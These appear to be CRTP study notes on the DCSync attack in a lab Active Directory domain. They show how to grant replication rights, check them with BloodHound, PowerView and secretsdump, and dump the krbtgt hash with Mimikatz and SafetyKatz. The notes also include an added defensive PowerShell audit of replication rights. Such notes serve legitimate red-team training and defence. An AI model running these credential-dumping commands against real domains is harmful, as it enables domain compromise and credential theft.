Certified Red Team Professional (CRTP) - Notes

8.7.2 - DCSync Attack


DCSync Attack

DCSync is a post-exploitation technique used to extract sensitive data from an AD domain by abusing the AD replication feature, which governs how Domain Controllers synchronize data between themselves.

The DCSync attack tricks a DC into thinking the attacker is another legitimate DC that needs replication data.

The replication data extracted with this attack includes:

  • NTLM password hashes (including krbtgt)

  • Kerberos keys

  • Password history

DCSync can therefore be combined with other attacks, such as the Golden Ticket attack, to establish persistence in a domain.

Configuration of a vulnerable user

Log on to the Domain Controller:

  • Open Active Directory Users and Computers

  • Right-click the domain object dev-angelist.lab -> Properties -> Security -> Add (devan), Check Names, OK

Select the devan user and set these three permissions to Allow:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes In Filtered Set

and confirm.

Alternatively, the same rights can be set with the Set-ADACL command from the RACE module:

Import-Module .\RACE.ps1

Set-ADACL -SamAccountName devan `
-GUIDRight DCSync `
-DistinguishedName 'DC=dev-angelist,DC=lab' `
-Verbose

Check if a machine is vulnerable to DCSync attack

We can verify that the change took effect using BloodHound:

python3 -m venv venv
. venv/bin/activate
pip3 install bloodhound

bloodhound-python -u administrator -p 'P@$$W0rd' -ns 192.168.57.9 -d dev-angelist.lab -c All --zip
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
./bloodhound-cli containers start
#Access to Bloodhound UI at: http://127.0.0.1:8080/ui/login
#Go to file ingest and upload bloodhound zip file generated
#And check: Dangerous Privileges -> Principals with DCSync privileges

If the "AllExtendedRights" and "GenericAll" permissions appear there, the DCSync attack can be performed.

Alternatively, we can use PowerView (if we have access to the devan account):

Get-ObjectAcl -SamAccountName devan -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "Replicating"}

or we can check it from the attacker machine (Linux / Kali) using Impacket's secretsdump module:

secretsdump.py 'devan:new_password123'@192.168.57.9
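The same check from the defender's side, as an added example that is not part of the original notes: a PowerShell audit using the RSAT ActiveDirectory module (rather than PowerView) that lists every principal holding replication rights on the domain object, so that an unexpected account such as devan above stands out. It assumes the module is installed and the domain DN is discovered at run time.

```powershell
# Added audit example (not part of the original notes): list every principal that can
# replicate the domain naming context, i.e. every principal able to run DCSync.
# Requires the RSAT ActiveDirectory module and read access to the domain object.
Import-Module ActiveDirectory

# Schema GUIDs of the three replication extended rights shown in ADUC above.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DCSyncPrincipal {
    $domainDN = (Get-ADDomain).DistinguishedName      # e.g. DC=dev-angelist,DC=lab
    $acl      = Get-Acl -Path "AD:\$domainDN"
    $findings = @{}

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid   = $ace.ObjectType.ToString()
        $rights = $ace.ActiveDirectoryRights.ToString()

        if ($ReplicationRights.ContainsKey($guid)) {
            $label = $ReplicationRights[$guid]
        } elseif ($rights -match 'GenericAll') {
            $label = 'GenericAll (implies every extended right)'
        } elseif ($rights -match 'ExtendedRight' -and $guid -eq [Guid]::Empty.ToString()) {
            $label = 'AllExtendedRights (unrestricted extended rights)'
        } else {
            continue                                    # not relevant to replication
        }

        $who = $ace.IdentityReference.Value
        if (-not $findings.ContainsKey($who)) { $findings[$who] = @() }
        $findings[$who] += $label
    }

    # Get-Changes together with Get-Changes-All is the pair that lets a principal pull
    # secrets; compare the output against the expected baseline (domain controller
    # groups and built-in administrators) and treat anything else as DCSync-capable.
    foreach ($who in ($findings.Keys | Sort-Object)) {
        [PSCustomObject]@{
            Principal = $who
            Rights    = ($findings[$who] | Sort-Object -Unique) -join '; '
        }
    }
}

Get-DCSyncPrincipal | Format-Table -AutoSize
```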

Mimikatz

Let's assume we have low-privileged access to a workstation joined to the domain; in my case I log in with the dev-angelist\devan account.

Download and extract Mimikatz:

iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#Use the Win32 folder in this case, because this machine is 32-bit

and run it to dump the NTLM hash of the krbtgt user (both commands are passed as quoted arguments on one line):

.\mimikatz.exe "lsadump::dcsync /domain:dev-angelist.lab /user:krbtgt" "exit"

Using SafetyKatz

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"

Labs

Alternatively, we can upload the collected data and log in to neo4j directly, or use the bloodhound-cli tool.

Related pages: bloodhound-cli, Learning Object 12 lab